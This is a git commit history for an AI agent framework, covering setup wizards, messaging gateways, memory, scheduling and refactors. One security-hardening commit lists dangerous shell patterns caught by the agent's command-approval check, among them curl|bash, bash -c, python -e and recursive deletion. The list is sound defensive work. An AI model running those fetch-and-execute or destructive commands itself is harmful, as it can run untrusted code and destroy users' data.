f64a87209d refactor: enhance session content handling in AIAgent and update TTS output path
- Introduced a new static method `_clean_session_content` in the `AIAgent` class to convert REASONING_SCRATCHPAD tags to <think> blocks and clean up whitespace in session logs.
- Updated the `_save_session_log` method to utilize the cleaned content for assistant messages, ensuring consistency in session logs.
- Changed the default output directory for TTS audio files from `~/voice-memos` to `~/.hermes/audio_cache`, reflecting a more appropriate storage location.
2026-02-25 04:22:03 -08:00
teknium1
41df8ee4f5 refactor: enhance interrupt handling in AIAgent class
- Updated the `clear_interrupt` method to also reset the global tool interrupt signal, improving the clarity of interrupt management within the agent.
- This change ensures that all interrupt states are properly cleared, enhancing the reliability of the agent's operation.
2026-02-25 03:45:47 -08:00
teknium1
6877d5f3b5 docs: add note on message delivery in cronjob_tools
- Included a note clarifying that the agent's final response is auto-delivered to the target, advising against using send_message in the prompt. This enhances user understanding of the message delivery process.
2026-02-25 03:29:10 -08:00
teknium1
6d74d424d3 refactor: update job execution configuration loading in scheduler
- Implemented dynamic loading of environment variables and configuration settings for job execution, allowing for real-time updates without restarting the gateway.
- Enhanced model and API configuration retrieval from both environment variables and a YAML configuration file, improving flexibility and adaptability of the job execution process.
2026-02-25 02:54:13 -08:00
teknium1
9ec4f7504b Provide example datagen config scripts 2026-02-25 02:27:41 -08:00
teknium1
9166d56f17 style: enhance landing page responsiveness and layout
- Added overflow-x hidden to prevent horizontal scrolling on the landing page.
- Updated mobile styles for various elements including hero, sections, and grids to improve layout and readability on smaller screens.
- Adjusted padding, font sizes, and display properties for better user experience across devices.
2026-02-24 18:11:27 -08:00
teknium1
80b90dd0d9 refactor: update landing page metadata for clarity and engagement
- Revised the title and description in the landing page to better convey the agent's adaptability and user-centric features.
- Enhanced Open Graph description for improved social media sharing and clarity of the agent's capabilities.
2026-02-24 18:08:57 -08:00
teknium1
91907789af refactor: remove temporary debug logging in code execution tool
- Eliminated the temporary debug logging in the `execute_code` function that tracked enabled and sandbox tools, streamlining the code and reducing clutter.
2026-02-24 14:25:53 -08:00
teknium1
6845852e82 refactor: update failure message handling in display module and add debug logging in code execution tool
- Modified the `_wrap` function to append a failure suffix without applying red coloring, simplifying the failure message format.
- Introduced temporary debug logging in the `execute_code` function to track enabled and sandbox tools, aiding in troubleshooting.
2026-02-24 14:25:53 -08:00
teknium1
99af12af3f chore: update landing page hero text for improved messaging
- Changed the hero title from "An AI agent you can actually live with." to "An agent that grows with you." to better reflect the agent's adaptability and user-centric approach.
- This update aims to enhance the overall appeal and clarity of the landing page content.
2026-02-24 04:13:45 -08:00
teknium1
fd76ff60ac fix: improve stdout/stderr handling in delegate_task function
- Saved and restored stdout/stderr to prevent redirection issues in child threads, ensuring consistent output during task delegation.
- Enhanced reliability of output handling in concurrent execution scenarios.
2026-02-24 04:13:32 -08:00
teknium1
cc6bea8b90 feat: enhance session search tool with parent session resolution and parallel summarization
- Added a new function to resolve child sessions to their parent, improving session grouping and deduplication.
- Refactored session summarization to run in parallel, enhancing performance and responsiveness.
- Updated search syntax documentation to clarify usage of keywords and phrases for better search results.
2026-02-24 04:07:37 -08:00
teknium1
c1d9e9a285 refactor: improve stdout handling in KawaiiSpinner class
- Captured stdout at spinner creation to prevent redirection issues from child agents.
- Replaced direct print statements with a new `_write` method for consistent output handling during spinner animation and final message display.
- Enhanced code maintainability and clarity by centralizing output logic.
2026-02-24 03:48:11 -08:00
teknium1
681141a526 fix: ansi escapes causing broken terminal cli output 2026-02-24 03:42:12 -08:00
teknium1
c100541f07 refactor: remove direct stdout handling in spinner class
- Eliminated the `_raw_write` function to simplify output handling in the `KawaiiSpinner` class.
- Updated spinner animation and final message display to use standard print statements, ensuring compatibility with prompt_toolkit.
- Improved code clarity and maintainability by reducing complexity in the output rendering process.
2026-02-24 03:40:52 -08:00
teknium1
d64f62c2ef feat: enhance spinner output handling in display module
- Added a new function `_raw_write` to write directly to stdout, bypassing prompt_toolkit's interference with ANSI escapes and carriage returns.
- Updated the `KawaiiSpinner` class to utilize `_raw_write` for rendering spinner animations and final messages, ensuring proper display in terminal environments.
- Improved the clarity of output handling during spinner operations, enhancing user experience during tool execution.
2026-02-24 03:30:28 -08:00
teknium1
e049441d93 feat: add reasoning effort configuration for agent
- Introduced a new configuration option for reasoning effort in the CLI, allowing users to specify the level of reasoning the agent should perform before responding.
- Updated the CLI and agent initialization to incorporate the reasoning configuration, enhancing the agent's responsiveness and adaptability.
- Implemented logic to load reasoning effort from environment variables and configuration files, providing flexibility in agent behavior.
- Enhanced the documentation in the example configuration file to clarify the new reasoning effort options available.
2026-02-24 03:30:19 -08:00
teknium1
a30b2f34eb feat: add landing page for Hermes Agent
- Introduced a new landing page with HTML, CSS, and JavaScript files to showcase the Hermes Agent.
- Added a banner image and logo to enhance visual appeal.
- Implemented interactive features such as a copy-to-clipboard function for installation commands and scroll-triggered animations for improved user engagement.
- Designed a responsive layout with sections detailing the agent's features, installation instructions, and community links.
2026-02-24 03:25:22 -08:00
teknium1
2bf96ad244 feat: add ephemeral prefill messages and system prompt loading
- Implemented functionality to load ephemeral prefill messages from a JSON file, enhancing few-shot priming capabilities for the agent.
- Introduced a mechanism to load an ephemeral system prompt from environment variables or configuration files, ensuring dynamic prompt adjustments at API-call time.
- Updated the CLI and agent initialization to utilize the new prefill messages and system prompt, improving the overall interaction experience.
- Enhanced configuration options with new environment variables for prefill messages and system prompts, allowing for greater customization without persistence.
2026-02-23 23:55:42 -08:00
teknium1
a183827128 feat: enhance README and improve environment configuration
- Added a new section in the README for Inference Providers, detailing setup instructions for Nous Portal, OpenRouter, and Custom Endpoints, improving user guidance for LLM connections.
- Updated messaging platform setup instructions to include Slack and WhatsApp, providing clearer steps for configuration.
- Introduced a new environment variable, TERMINAL_SANDBOX_DIR, to allow users to customize the sandbox storage location for Docker and Singularity environments.
- Refactored the Docker and Singularity environment classes to utilize the new sandbox directory for persistent workspaces, enhancing organization and usability.
- Improved handling of working directories across various environments, ensuring compatibility and clarity in execution paths.
2026-02-23 21:15:35 -08:00
teknium1
54dd1b3038 feat: enhance README and update API client initialization
- Updated the README to include new badges, a detailed description of the Hermes Agent, and a table summarizing its features, improving clarity and presentation for users.
- Modified the API client initialization in `transcription_tools.py` and `tts_tool.py` to include a base URL, ensuring compatibility with the OpenAI API.
2026-02-23 20:59:39 -08:00
Teknium
75d251b81a feat: add API key requirement checks for toolsets
- Introduced a new mapping for toolset environment variable requirements, enhancing the configuration process by prompting users for missing API keys.
- Implemented a function to check and prompt users for necessary API keys when enabling toolsets, improving user experience and ensuring proper setup.
- Updated the tools command to integrate the new API key checks, streamlining the configuration workflow for users.
2026-02-24 00:01:39 +00:00
Teknium
7a6d4666a2 refactor: clarify user prompts in checklist interfaces
- Updated messaging in the checklist prompts to simplify instructions for item selection, changing "Press SPACE to select items, then ENTER on Continue" to "SPACE to toggle, ENTER to confirm."
- Removed the "Continue →" entry from the menu items to streamline the selection process.
- Enhanced user experience by clarifying input prompts and removing unnecessary options, ensuring a more intuitive interaction.
2026-02-23 23:57:31 +00:00
Teknium
d802db4de0 refactor: improve tool configuration prompts for clarity
- Updated the display format of tool descriptions in the configuration prompts to enhance readability.
- Simplified the messaging for enabled tool counts, removing unnecessary color formatting for a cleaner output.
- Streamlined the exit message for the configuration process, improving user experience during tool setup.
2026-02-23 23:54:38 +00:00
Teknium
b103bb4c8b feat: add interactive tool configuration command
- Introduced a new `tools` command in the CLI for configuring enabled tools per platform.
- Implemented an interactive checklist for users to enable or disable toolsets for various platforms, enhancing customization options.
- Created a new `tools_config.py` file to handle the logic for toolset management and user prompts, improving code organization and user experience.
2026-02-23 23:52:07 +00:00
Teknium
a9d16c40c7 refactor: streamline API key prompt in setup wizard
- Introduced a new helper function to handle API key prompts, improving code organization and readability.
- Enhanced user experience by providing a formatted display for API key input, including tool descriptions and URLs.
- Simplified the setup wizard by replacing inline API key handling with the new helper function, ensuring consistent messaging and feedback during configuration.
2026-02-23 23:38:33 +00:00
Teknium
98e3a26b2a refactor: update user prompt in setup wizard for item selection
- Modified the prompt in the setup wizard to clarify the selection process, instructing users to press SPACE to select items and ENTER to continue, enhancing user experience during configuration.
2026-02-23 23:36:59 +00:00
Teknium
f209a92b7e refactor: enhance setup wizard for messaging platform configuration
- Updated the setup wizard to present messaging platforms as a checklist, allowing users to select which platforms to configure.
- Preserved the order of platforms while grouping them for improved clarity.
- Enhanced user prompts for setting up each selected messaging platform, streamlining the configuration process.
2026-02-23 23:32:32 +00:00
Teknium
0edfc7fa49 refactor: update tool progress environment variable defaults and improve setup wizard prompts
- Changed default value for HERMES_TOOL_PROGRESS from "false" to "true" to enable tool progress notifications by default.
- Updated default value for HERMES_TOOL_PROGRESS_MODE from "new" to "all" to provide more comprehensive progress updates.
- Enhanced the setup wizard prompts for enabling tool progress messages and context compression, improving user guidance and experience.
2026-02-23 23:31:07 +00:00
Teknium
cefe038a87 refactor: enhance environment variable configuration and setup wizard
- Updated the OPTIONAL_ENV_VARS dictionary to include a new "category" field for better organization of environment variables.
- Improved the setup wizard to categorize missing optional environment variables into tools and messaging platforms, enhancing user experience during configuration.
- Streamlined the prompts for configuring tools and messaging platforms, allowing for a more intuitive setup process.
2026-02-23 23:25:38 +00:00
Teknium
0858ee2f27 refactor: rename HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY
- Updated the environment variable name from HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY across multiple files to avoid interference with OpenRouter.
- Adjusted related error messages and configuration prompts to reflect the new variable name, ensuring consistency throughout the codebase.
2026-02-23 23:21:33 +00:00
Teknium
4d1f2ea522 refactor: remove unused multi_select_cursor_brackets_style in prompt_checklist function
- Eliminated the multi_select_cursor_brackets_style parameter from the prompt_checklist function, simplifying the code and improving clarity in the multi-select user interface.
2026-02-23 23:18:57 +00:00
Teknium
6447a6020c feat: add Node.js installation support to the setup script
- Introduced automatic installation of Node.js version 22 if not found on the system, enhancing the setup process for browser tools.
- Improved the check for existing Node.js installations, including support for Hermes-managed installations.
- Added logic to download and extract the appropriate Node.js binary based on the system architecture and OS.
- Updated the installation script to handle missing dependencies like ripgrep and ffmpeg, providing installation prompts for macOS users.
2026-02-23 23:18:13 +00:00
Teknium
b3bf21db56 refactor: update environment variable configuration and add multi-select checklist for tool setup
- Cleared the REQUIRED_ENV_VARS dictionary as no single environment variable is universally required.
- Enhanced the OPTIONAL_ENV_VARS with improved descriptions and added advanced options for better user guidance.
- Introduced a new prompt_checklist function to allow users to select tools during setup, improving the configuration experience.
- Updated the setup wizard to handle missing optional environment variables using the new checklist, streamlining the tool configuration process.
2026-02-23 23:06:47 +00:00
teknium1
674a6f96d3 feat: unify set-home command naming across platforms
- Updated the command name from `/set-home` to `/sethome` in the GatewayRunner class for consistency.
- Added a new slash command `/sethome` in the Discord adapter to set the home channel.
- Registered the `/sethome` command in the Telegram adapter to align with the updated naming convention.
2026-02-23 15:01:22 -08:00
teknium1
79f8831738 refactor: improve message source tagging in GatewayRunner
- Renamed variable `source` to `mirror_src` for clarity in the message tagging logic within the GatewayRunner class, enhancing code readability while maintaining functionality.
2026-02-23 14:58:52 -08:00
teknium1
224c900532 refactor: update session loading method in SessionStore
- Replaced the call to `_load()` with `_ensure_loaded()` in the `has_any_sessions` method to improve clarity and ensure that session data is properly initialized before checking for existing sessions.
2026-02-23 14:56:48 -08:00
teknium1
4f9f5f70e3 fix: handle missing toolset IDs in welcome banner
- Updated the toolset ID retrieval logic in the build_welcome_banner function to use a fallback to the toolset name if the ID is not present, ensuring robustness in displaying unavailable toolsets.
2026-02-23 14:55:53 -08:00
Teknium
38db6e9366 fix: correct toolset ID mapping in welcome banner
- Updated the mapping of unavailable toolsets in the welcome banner from using the internal toolset ID to the toolset name for improved clarity and accuracy in display.
2026-02-23 22:32:34 +00:00
teknium1
d18c753b3c refactor: streamline scratchpad handling in AIAgent
- Removed static methods for converting and checking <REASONING_SCRATCHPAD> tags, simplifying the codebase.
- Replaced calls to the removed methods with direct function calls for better clarity and maintainability.
- Updated trajectory saving logic to utilize a dedicated function for improved organization and readability.
2026-02-23 09:55:09 -08:00
teknium1
8fedbf87d9 feat: add cleanup utility for test artifacts in checkpoint resumption tests
- Introduced a new `_cleanup_test_artifacts` function to remove test-generated files and directories after test execution.
- Integrated the cleanup function into the `test_current_implementation` and `test_interruption_and_resume` tests to ensure proper resource management and prevent clutter from leftover files.
2026-02-23 02:16:10 -08:00
teknium1
d8a369e194 refactor: update API key checks in WebToolsTester
- Replaced the Nous API key check with the Auxiliary Model check in the WebToolsTester class.
- Updated the environment configuration to reflect the change in API key validation, ensuring accurate reporting of available keys.
2026-02-23 02:13:33 -08:00
teknium1
90af34bc83 feat: enhance interrupt handling and container resource configuration
- Introduced a shared interrupt signaling mechanism to allow tools to check for user interrupts during long-running operations.
- Updated the AIAgent to handle interrupts more effectively, ensuring in-progress tool calls are canceled and multiple interrupt messages are combined into one prompt.
- Enhanced the CLI configuration to include container resource limits (CPU, memory, disk) and persistence options for Docker, Singularity, and Modal environments.
- Improved documentation to clarify interrupt behaviors and container resource settings, providing users with better guidance on configuration and usage.
2026-02-23 02:11:33 -08:00
teknium1
c7857dc1d4 feat: enhance AIAgent's tool usage nudges and content handling
- Introduced a method to strip <think> blocks from content, improving text visibility.
- Implemented counters to reset nudge intervals when memory and skill tools are used, enhancing user guidance.
- Captured content from turns with tool calls to provide fallback responses, ensuring continuity in conversation.
- Updated nudge logic to remind users about saving memories and creating skills based on interaction patterns.
2026-02-22 21:33:28 -08:00
teknium1
08e4dc2563 feat: implement channel directory and message mirroring for cross-platform communication
- Introduced a new channel directory to cache reachable channels/contacts for messaging platforms, enhancing the send_message tool's ability to resolve human-friendly names to numeric IDs.
- Added functionality to mirror sent messages into the target's session transcript, providing context for cross-platform message delivery.
- Updated the send_message tool to support listing available targets and improved error handling for channel resolution.
- Enhanced the gateway to build and refresh the channel directory during startup and at regular intervals, ensuring up-to-date channel information.
2026-02-22 20:44:15 -08:00
teknium1
92447141d9 feat: integrate config.yaml values into environment for enhanced flexibility
- Added functionality to load values from config.yaml into the environment, allowing os.getenv() to access them.
- Ensured that existing environment variables take precedence over config values.
- Updated DiscordAdapter to resolve usernames in DISCORD_ALLOWED_USERS to numeric IDs, improving user authorization checks.
- Enhanced event handling to provide clearer logging and ensure proper synchronization of slash commands.
2026-02-22 17:35:45 -08:00
teknium1
e0ed44388f fix: improve error messaging for chat ID and home channel configuration
- Enhanced warning in `_deliver_result` to provide clearer instructions for setting the home channel.
- Updated error message in `send_message_tool` to specify how to set a home channel when no chat ID is provided, improving user guidance.
2026-02-22 17:28:52 -08:00
teknium1
16d0aa7b4d feat: enhance job delivery mechanism in scheduler
- Introduced a new `_deliver_result` function to handle job output delivery to specified platforms.
- Added origin resolution logic to determine the correct delivery target based on job configuration.
- Updated `run_job` to return the final response along with the output for improved context.
- Integrated delivery of job results to the origin chat or fallback channels, with error handling for delivery failures.
- Cleaned up environment variables after job execution to prevent leakage between jobs.
2026-02-22 17:14:44 -08:00
teknium1
6037b6a5ab Fix session saving to DB with full conversation history (not just user/assistant messages without tool calls) 2026-02-22 17:10:24 -08:00
teknium1
e1604b2b4a feat: enhance user authorization checks in GatewayRunner
- Updated the authorization logic to include a per-platform allow-all flag for improved flexibility.
- Revised the order of checks to prioritize platform-specific allow-all settings, followed by environment variable allowlists and DM pairing approvals.
- Added global allow-all configuration for broader access control.
- Improved handling of allowlists by stripping whitespace and ensuring valid entries are processed.
2026-02-22 16:32:08 -08:00
teknium1
db23f51bc6 feat: introduce skills management features in AIAgent and CLI
- Added skills configuration options in cli-config.yaml.example, including a nudge interval for skill creation reminders.
- Implemented skills guidance in AIAgent to prompt users to save reusable workflows after complex tasks.
- Enhanced skills indexing in the prompt builder to include descriptions from SKILL.md files for better context.
- Updated the agent's behavior to periodically remind users about potential skills during tool-calling iterations.
2026-02-22 13:28:13 -08:00
teknium1
3c6750f37b feat: enhance memory management features in AIAgent and CLI
- Added configuration options for memory nudge interval and flush minimum turns in cli-config.yaml.example.
- Implemented memory flushing before conversation reset, clearing, and exit in the CLI to ensure memories are saved.
- Introduced a flush_memories method in AIAgent to handle memory persistence before context loss.
- Added periodic nudges to remind the agent to consider saving memories based on user interactions.
2026-02-22 10:15:17 -08:00
teknium1
df2ec585f1 fix: clarify MEMORY_GUIDANCE phrasing
- Updated the MEMORY_GUIDANCE text to improve clarity by rephrasing the usage instructions for the memory tool, emphasizing its diary-like functionality.
2026-02-22 02:41:27 -08:00
teknium1
250b2ca01a fix: update MEMORY_GUIDANCE for clarity
- Revised the MEMORY_GUIDANCE text to enhance clarity by adjusting the phrasing for better user understanding of memory tool usage.
2026-02-22 02:40:16 -08:00
teknium1
c2d5f7bf26 feat: add timestamp formatting function for session metadata
- Introduced a new `_format_timestamp` function to convert Unix timestamps and ISO strings into a human-readable date format.
- Updated the session metadata handling to use the new formatting function for improved clarity in session start dates.
- Adjusted the output structure to reflect the change from "Session started" to "Session date" for better user understanding.
2026-02-22 02:37:26 -08:00
teknium1
e223b4ac09 Enhance agent guidance with memory and session search tools
- Introduced MEMORY_GUIDANCE and SESSION_SEARCH_GUIDANCE to improve agent's contextual awareness and proactive assistance.
- Updated AIAgent to conditionally include tool-aware guidance in prompts based on available tools.
- Enhanced descriptions in memory and session search schemas for clearer user instructions on when to utilize these features.
2026-02-22 02:31:52 -08:00
teknium1
f072801f38 refactor: remove unused compression model variable in AIAgent
- Eliminated the `compression_model` variable from the AIAgent class, as it was not being utilized.
- Cleaned up the context compressor initialization for improved clarity and maintainability.
2026-02-22 02:17:33 -08:00
teknium1
ededaaa874 Hermes Agent UX Improvements 2026-02-22 02:16:11 -08:00
teknium1
b1f55e3ee5 refactor: reorganize agent and CLI structure for improved clarity
- Extracted agent internals into a dedicated `agent/` directory, including model metadata, context compression, and prompt handling.
- Enhanced CLI structure by separating banner, commands, and callbacks into distinct modules within `hermes_cli/`.
- Updated README to reflect the new directory organization and clarify the purpose of each component.
- Improved tool registration and terminal execution backends for better maintainability and usability.
2026-02-21 23:17:18 -08:00
teknium1
51b95236f9 refactor: move model metadata functions to agent/model_metadata.py
- Relocated functions related to model metadata, including fetch_model_metadata, get_model_context_length, estimate_tokens_rough, and estimate_messages_tokens_rough, to agent/model_metadata.py for better organization and maintainability.
- Updated imports in run_agent.py to reflect the new location of these functions.
2026-02-21 22:34:18 -08:00
teknium1
9123cfb5dd Refactor Terminal and AIAgent cleanup 2026-02-21 22:31:43 -08:00
teknium1
9018e9dd70 refactor: update tool registration and documentation
- Enhanced tool registration process by implementing a self-registering mechanism in each tool file via `tools/registry.py`.
- Updated `model_tools.py` to serve as a thin orchestration layer, simplifying tool discovery and registration.
- Revised documentation to clarify the steps for adding new tools, emphasizing the importance of schema, handler, and registration consistency.
- Improved dependency resolution in environments by ensuring toolsets are queried from `tools/registry.py`.
2026-02-21 21:03:40 -08:00
teknium1
08ff1c1aa8 More major refactor/tech debt removal! 2026-02-21 20:22:33 -08:00
teknium1
6134939882 refactor: deduplicate toolsets, unify async bridging, fix approval race condition, harden security
- Replace 4 copy-pasted messaging platform toolsets with shared _HERMES_CORE_TOOLS list
- Consolidate 5 ad-hoc async-bridging patterns into single _run_async() in model_tools.py
  - Removes deprecated get_event_loop()/set_event_loop() calls
  - Makes all tool handlers self-protecting regardless of caller's event loop state
  - RL handler refactored from if/elif chain to dispatch dict
- Fix exec approval race condition: replace module-level globals with thread-safe
  per-session tools/approval.py (submit_pending, pop_pending, approve_session, is_approved)
  - Session A approving "rm" no longer approves it for all other sessions
- Fix config deep merge: user overriding tts.elevenlabs.voice_id no longer clobbers
  tts.elevenlabs.model_id; migration detection now recurses to arbitrary depth
- Gateway default-deny: unauthenticated users denied unless GATEWAY_ALLOW_ALL_USERS=true
- Add 10 dangerous command patterns: rm --recursive, bash -c, python -e, curl|bash,
  xargs rm, find -delete
- Sanitize gateway error messages: users see generic message, full traceback goes to logs
2026-02-21 18:28:49 -08:00
teknium1
7cb6427dea refactor: streamline cron job handling and update CLI commands
- Removed legacy cron daemon functionality, integrating cron job execution directly into the gateway process for improved efficiency.
- Updated CLI commands to reflect changes, replacing `hermes cron daemon` with `hermes cron status` and enhancing documentation for cron job management.
- Clarified messaging in the README and other documentation regarding the gateway's role in managing cron jobs.
- Removed obsolete terminal_hecate tool and related configurations to simplify the codebase.
2026-02-21 16:21:19 -08:00
teknium1
79b62497d1 enable cronjobs in messaging platforms 2026-02-21 12:46:18 -08:00
teknium1
0729ef7353 fix: refine environment creation condition in terminal_tool
- Updated the environment creation condition to specifically check for "singularity" instead of allowing "local", ensuring more precise handling of environment types during task execution.
2026-02-21 12:43:56 -08:00
teknium1
8f6788474b feat: enhance logging in AIAgent for quiet mode
- Added functionality to suppress logging noise from specific modules when in quiet mode, improving user experience in CLI.
- Updated terminal_tool.py to change the log level for fallback directory usage from warning to debug, providing clearer context without cluttering logs.
2026-02-21 12:41:05 -08:00
teknium1
5c2926102b fix: improve placeholder handling and hint height in CLI
- Updated the placeholder text logic to append new fragments after existing ones, preserving the prompt appearance.
- Adjusted the hint height to maintain a 1-line spacer while the agent is running, preventing output from crowding the input area.
2026-02-21 12:36:14 -08:00
teknium1
bff37075f6 feat: enhance CLI input handling with password masking and placeholder text
- Added input processors for password masking during sudo prompts and inline placeholder text for various states in the CLI.
- Implemented a custom placeholder processor to display context-sensitive instructions based on the current state (e.g., sudo, approval, clarify).
- Updated hint text logic to improve user guidance during interactive prompts, enhancing overall user experience.
2026-02-21 12:33:48 -08:00
teknium1
c98ee98525 feat: implement interactive prompts for sudo password and command approval in CLI
- Added methods for handling sudo password and dangerous command approval prompts using a callback mechanism in cli.py.
- Integrated these prompts with the prompt_toolkit UI for improved user experience.
- Updated terminal_tool.py to support callback registration for interactive prompts, enhancing the CLI's interactivity.
- Introduced a background thread for API calls in run_agent.py to allow for interrupt handling during long-running operations.
- Enhanced error handling for interrupted API calls, ensuring graceful degradation of user experience.
2026-02-21 12:15:40 -08:00
teknium1
ecb430effe refactor: enhance API interaction and message handling in AIAgent
- Introduced new methods in run_agent.py for building API keyword arguments and normalizing assistant messages from API responses.
- Added functionality for compressing conversation context and managing session state in SQLite.
- Improved tool call execution handling, including enhanced logging and error management.
- Updated path handling in multiple platform files to utilize pathlib for better compatibility and readability.
2026-02-21 04:17:27 -08:00
teknium1
7ee7221af1 refactor: consolidate debug logging across tools with shared DebugSession class
- Introduced a new DebugSession class in tools/debug_helpers.py to centralize debug logging functionality, replacing duplicated code across various tool modules.
- Updated image_generation_tool.py, mixture_of_agents_tool.py, vision_tools.py, web_tools.py, and others to utilize the new DebugSession for logging tool calls and saving debug logs.
- Enhanced maintainability and consistency in debug logging practices across the codebase.
2026-02-21 03:53:24 -08:00
teknium1
748fd3db88 refactor: enhance error handling with structured logging across multiple modules
- Updated various modules including cli.py, run_agent.py, gateway, and tools to replace silent exception handling with structured logging.
- Improved error messages to provide more context, aiding in debugging and monitoring.
- Ensured consistent logging practices throughout the codebase, enhancing traceability and maintainability.
2026-02-21 03:32:11 -08:00
teknium1
cbff1b818c refactor: remove obsolete Nous API test scripts
- Deleted test scripts for Nous API limits, patterns, and temperature checks to streamline the testing suite.
- These scripts were no longer necessary and their removal helps maintain a cleaner codebase.
2026-02-21 03:21:13 -08:00
teknium1
a885d2f240 refactor: implement structured logging across multiple modules
- Introduced logging functionality in cli.py, run_agent.py, scheduler.py, and various tool modules to replace print statements with structured logging.
- Enhanced error handling and informational messages to improve debugging and monitoring capabilities.
- Ensured consistent logging practices across the codebase, facilitating better traceability and maintenance.
2026-02-21 03:11:11 -08:00
teknium1
b6247b71b5 refactor: update tool descriptions for clarity and conciseness
- Revised descriptions for various tools in model_tools.py, browser_tool.py, code_execution_tool.py, delegate_tool.py, and terminal_tool.py to enhance clarity and reduce verbosity.
- Improved consistency in terminology and formatting across tool descriptions, ensuring users have a clearer understanding of tool functionalities and usage.
2026-02-21 02:41:30 -08:00
teknium1
3555c6173d refactor: remove temporary API payload logging and enhance session log structure
- Eliminated the `_log_api_payload` method used for temporary debugging, streamlining the codebase.
- Updated the `_save_session_log` method to save the full raw session, including all messages and metadata, improving the clarity and completeness of session logs.
- Adjusted session log entry to include additional context such as `base_url` and `platform` for better tracking.
2026-02-21 01:26:37 -08:00
teknium1
3976962621 fix: update session logging directory path in README and code
- Changed the session logging directory from `~/.hermes-agent/logs/` to `~/.hermes/sessions/` for consistency.
- Updated the `run_agent.py` to reflect the new logging path, ensuring session logs are stored correctly alongside gateway sessions.
2026-02-21 01:20:18 -08:00
teknium1
a54a27595b fix: update browser command connection instructions to prevent session conflicts
- Clarified the usage of the --cdp flag when connecting to an existing Browserbase session.
- Emphasized the importance of not using --session with --cdp to avoid creating a local browser instance in agent-browser >=0.13.
- Updated comments to reflect changes in per-task isolation management with AGENT_BROWSER_SOCKET_DIR.
2026-02-21 00:54:01 -08:00
teknium1
7283b9f6cf feat: extend browser session management with improved thread safety and timeout configuration
- Increased the default session inactivity timeout from 2 to 5 minutes to accommodate LLM reasoning during multi-step tasks.
- Enhanced thread safety by implementing locks around session activity tracking and cleanup processes, allowing concurrent access by multiple subagents.
- Removed the stale daemon cleanup function, as it is no longer necessary with the updated session management approach.
- Updated logging and session cleanup logic to ensure proper handling of active sessions and associated resources.
2026-02-21 00:44:25 -08:00
teknium1
3dfc0a9679 feat: add PPTX editing and creation skills with comprehensive documentation
- Introduced new skills for editing and creating PPTX presentations, including a detailed guide on template-based workflows and script usage.
- Added scripts for slide management, cleaning, and packing PPTX files, enhancing the overall functionality for users.
- Included a LICENSE file to clarify usage rights and restrictions.
- Created a SKILL.md file to provide an overview and quick reference for PPTX-related tasks.
- Documented various formatting rules, common pitfalls, and design ideas to improve presentation quality.
2026-02-21 00:32:26 -08:00
teknium1
6903c4605c chore: update package-lock.json with new dependencies and version upgrades
- Upgraded the agent-browser dependency to version 0.13.0.
- Added multiple new dependencies including @appium/logger, @wdio/config, and others, along with their respective versions and licenses.
- Updated the integrity checks and resolved URLs for the new packages.
- Ensured compatibility with Node.js versions by specifying engine requirements for new dependencies.
2026-02-21 00:32:26 -08:00
teknium1
5b3f708fcb feat: enhance stale daemon cleanup and improve error logging in browser tool
- Updated the stale daemon cleanup function to support multiple patterns for identifying orphaned agent-browser processes, improving reliability across different versions.
- Added logging for stderr output during browser command execution to aid in diagnostics, particularly for capturing warnings from the agent-browser.
- Implemented a warning for empty snapshots returned from the agent-browser, indicating potential issues with stale daemons or CDP connections.
2026-02-21 00:27:35 -08:00
teknium1
b33ed9176f feat: update database schema and enhance message persistence
- Incremented schema version to 2 and added a new column `finish_reason` to the `messages` table.
- Implemented a method to flush un-logged messages to the session database, ensuring data integrity during conversation interruptions.
- Enhanced error handling to persist messages in various early-return scenarios, preventing data loss.
2026-02-21 00:05:39 -08:00
teknium1
c48817f69b chore: update agent-browser dependency and clean up stale daemon processes
- Upgraded the agent-browser dependency from version 0.7.6 to 0.13.0 in package.json.
- Added functionality to kill stale agent-browser daemon processes in browser_tool.py to prevent orphaned instances from previous runs.
2026-02-20 23:40:42 -08:00
teknium1
70dd3a16dc Cleanup time! 2026-02-20 23:23:32 -08:00
teknium1
9a19fe1f50 chore: remove deprecated session viewer and exported data files
- Deleted the session_viewer.html file, which was no longer in use.
- Removed the exprted.jsonl file, as it contained outdated exported data that is no longer relevant to the current project structure.
2026-02-20 23:02:02 -08:00
teknium1
3961f8e7a4 refactor: update README for improved clarity on provider setup and switching
- Revised the "Getting Started" section to clarify the installation process with `hermes setup`.
- Enhanced instructions for changing providers and models using the `hermes model` command.
- Streamlined the explanation of available provider options, including Nous Portal, OpenRouter, and custom endpoints.
2026-02-20 21:31:45 -08:00
teknium1
fc37b17b1f feat: simplify README instructions for connecting to LLM providers
- Streamlined the "Getting Started" section to focus on connecting to the Nous Portal.
- Removed detailed options for other providers, emphasizing the quickest setup method.
- Clarified the process for switching providers and models using the `hermes model` command.
2026-02-20 21:28:06 -08:00
teknium1
630bd3d789 feat: improve password prompt handling in terminal tool
- Replaced getpass with direct reading from /dev/tty to enhance password input handling without echoing.
- Updated threading logic for password input to ensure proper cleanup and error handling.
- Improved visual feedback during password prompt, including clearer separation and timeout messaging.
- Enhanced user experience by providing immediate feedback on password input status.
2026-02-20 21:26:31 -08:00
teknium1
5c4c0c0cba feat: update branding and visuals across the project
- Updated the README to include a new banner image and changed the title emoji from 🦋 to ⚕.
- Modified various CLI outputs and scripts to reflect the new branding, ensuring consistency in the use of the ⚕ emoji.
- Added a new banner image asset for enhanced visual appeal during installation and setup processes.
2026-02-20 21:25:04 -08:00
teknium1
24c241d29b add github project management skill 2026-02-20 21:15:17 -08:00
teknium1
a3d760ff12 feat: implement provider deactivation and enhance configuration updates
- Added a new function to deactivate the active provider without deleting credentials, facilitating smoother transitions between different provider types.
- Updated the model flow logic to ensure the active provider is correctly set in the configuration, including handling custom endpoints and OAuth providers.
- Improved error handling in the CLI to consistently format authentication error messages.
- Enhanced the model selection process to reflect the effective provider based on configuration and environment variables.
2026-02-20 18:17:55 -08:00
teknium1
77a3dda59d feat: enhance README and CLI with multi-provider model selection
- Added a comprehensive "Getting Started" section in the README to guide users through selecting inference providers.
- Implemented an interactive model selection feature in the CLI, allowing users to choose from available models or enter a custom model name.
- Improved user experience by displaying the current model and active provider during selection, with clear instructions for each provider type.
- Updated the model selection process to prioritize the currently active model, enhancing usability and clarity.
2026-02-20 17:52:46 -08:00
teknium1
f6daceb449 feat: add interactive model selection and saving functionality
- Implemented a new interactive model selection feature after user login, allowing users to choose from available models or enter a custom model name.
- Added functionality to save the selected model to the configuration file and environment variables, ensuring persistence across sessions.
